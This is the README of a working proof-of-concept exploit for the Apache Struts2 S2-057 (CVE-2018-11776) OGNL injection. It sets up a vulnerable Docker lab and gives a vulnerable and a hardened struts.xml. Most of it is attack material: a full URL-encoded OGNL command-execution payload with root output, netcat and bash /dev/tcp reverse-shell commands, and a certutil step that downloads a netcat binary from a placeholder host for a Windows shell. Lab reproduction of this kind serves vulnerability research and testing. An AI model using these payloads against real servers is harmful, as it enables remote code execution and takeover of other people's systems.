hook-s3c (github.com/hook-s3c), @hook_s3c on twitter
Working Python test and PoC for CVE-2018-11776 (S2-057), originally published at https://github.com/hook-s3c/CVE-2018-11776-Python-PoC
Man Yue Mo from Semmle has disclosed a Struts2 RCE vulnerability (S2-057): an OGNL expression placed in the namespace part of the URL path is evaluated by the server, so the whole payload travels in the path of an ordinary GET request.
Versions affected are 2.3 to 2.3.34, and 2.5 to 2.5.16.
Default configuration is not vulnerable; it takes a misconfiguration. The lab below reproduces the conditions Semmle described: struts.mapper.alwaysSelectFullNamespace set to true, an action with no (or a wildcard) namespace, and a redirectAction result with no namespace of its own.
The exploit works fine against the docker container built for CVE-2017-5638 (struts2-showcase 2.3.12) once the two configuration changes below are made;
$ docker pull piesecurity/apache-struts2-cve-2017-5638
$ docker run -d --name struts2 -p 32771:8080 piesecurity/apache-struts2-cve-2017-5638
open a shell in the container and edit struts.xml;
$ docker exec -it struts2 bash
$ apt-get install vim
$ vim /usr/local/tomcat/webapps/ROOT/WEB-INF/classes/struts.xml
add the action below (note there is no namespace on the action and none on its redirectAction result);
<action name="help">
<result type="redirectAction">
<param name="actionName">date.action</param>
</result>
</action>
and also, inside the top-level <struts> element;
<struts>
<constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />
restart tomcat; shutdown.sh ends the container's main process, so bring the container back up from the host afterwards
$ /usr/local/tomcat/bin/shutdown.sh
$ docker start struts2
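For reference, the two lab settings above assembled into one file, beside a hardened equivalent. This is an added example, not a file from this repository or from the showcase app; the package name "default" and the rest of the file are assumed, only the action, result and constant come from the steps above.

```xml
<!-- VULNERABLE lab configuration (what the steps above add, assumed package name):
     full-namespace selection on, an action without a namespace, and a
     redirectAction result without a namespace param. The namespace taken from
     the request path, e.g. /${2+2}, is reused to build the redirect and evaluated. -->
<struts>
    <constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />
    <package name="default" extends="struts-default">
        <action name="help">
            <result type="redirectAction">
                <param name="actionName">date.action</param>
            </result>
        </action>
    </package>
</struts>

<!-- HARDENED equivalent (separate file, same assumed package name): leave
     alwaysSelectFullNamespace at its default of false, give the package a fixed
     namespace and give the redirectAction result an explicit namespace param, so
     the attacker-controlled path segment is never used to build the redirect.
     This only removes the misconfiguration; upgrading to 2.3.35 / 2.5.17 is the fix. -->
<struts>
    <constant name="struts.mapper.alwaysSelectFullNamespace" value="false" />
    <package name="default" namespace="/" extends="struts-default">
        <action name="help">
            <result type="redirectAction">
                <param name="actionName">date.action</param>
                <param name="namespace">/</param>
            </result>
        </action>
    </package>
</struts>
```

With the hardened file in place the test URL below should redirect to /${2+2}/date.action unevaluated, or simply 404, instead of /4/date.action.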
test the url in a browser to see whether the namespace is evaluated and carried into the redirect; ${2+2} turning into 4 in the Location header means OGNL ran;
http://0.0.0.0:32771/${2+2}/help.action redirects to http://0.0.0.0:32771/4/date.action
with the test script;
$ ./exploitS2-057-test.py http://0.0.0.0:32771/showcase.action
testing the url for exploit; http://0.0.0.0:32771/${12612+24867}/help.action
URL http://0.0.0.0:32771/showcase.action s2-057 CVE-2018-11776 is vulnerable!
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'id'
[Execute]: id
[Url]: http://0.0.0.0:32771/%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.%28%23cmd%3D%27id%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27c%27%2C%23cmd%7D%3A%7B%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/help.action
uid=0(root) gid=0(root) groups=0(root)
get your box ready to accept the reverse shell;
$ netcat -lvp 31337
run the script;
# netcat is not in the image, install it in the container first
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'apt-get install netcat -y'
# now pop that shell; $SHELL stands in for /bin/bash (see the forward-slash note below)
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'netcat -e "$SHELL" 172.17.0.1 31337'
replace 32771 with your exposed container port, and 172.17.0.1 (docker's default bridge gateway) with whatever address the container can reach your listener on
# or, without netcat, a bash reverse shell (relies on literal forward-slashes in the payload, see the note below)
$ netcat -lvp 31337
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 "/bin/bash -i >& /dev/tcp/172.17.0.1/31337 0>&1"
# windows target (untested): grab a netcat binary with certutil, the usual download-without-extra-tools trick
# https://stackoverflow.com/questions/28143160/how-can-i-download-a-file-with-batch-file-without-using-any-external-tools
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'certutil.exe -urlcache -split -f "https://yourhostingservice.1337/files/netcat.exe" nc.exe'
# execute
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'nc.exe 172.17.0.1 31337 -e cmd.exe'
Requests whose payload contains a forward-slash (/) used to fail: the script percent-encodes the payload, and Tomcat rejects an encoded slash (%2F) in the request path by default (the org.apache.tomcat.util.buf.UDecoder.ALLOW_ENCODED_SLASH property), so any command containing a path was refused. The workaround was to reach such paths through environment variables, e.g. $SHELL for /bin/bash in the example above.
- https://stackoverflow.com/questions/9719224/coding-forward-and-backward-slashes-in-tomcat-7
- http://engineering.widen.com/blog/tomcat-slashes/
With this in mind, the Windows /c flag will not work as expected. I've only tested this on the docker container.
Thanks to @Menin_TheMiddle for showing that the forward-slash issue can be resolved. The code now supports forward-slashes, so a reverse shell via bash without netcat is also possible, and Windows instances are now supported too (untested).
Patch your Struts, or simply don't use it.
I guess you can always sell identity fraud products if you happen to have a breach and all your customer details are leaked! (you know who you are, absolute scum)
Thanks to;
- Man Yue Mo, Semmle for disclosing the vulnerability (https://semmle.com/news/apache-struts-CVE-2018-11776)
- piesecurity for the Dockerfile lab and example of OGNL payload (https://github.com/piesecurity/apache-struts2-CVE-2017-5638)
- xfox64x for the write-up on the method (https://github.com/xfox64x/CVE-2018-11776)
- jiguang7 for the test (https://github.com/jiguang7/CVE-2018-11776)
- @Menin_TheMiddle for the writeup (https://www.secjuice.com/apache-struts2-cve-2018-11776/) and putting me in my place :) (the code now finally supports Windows and a bash reverse shell)
shout out to vap0rsquad!!! sH3llG0d - Willow - D@3M0¢π1 - n4t4s - 23pieces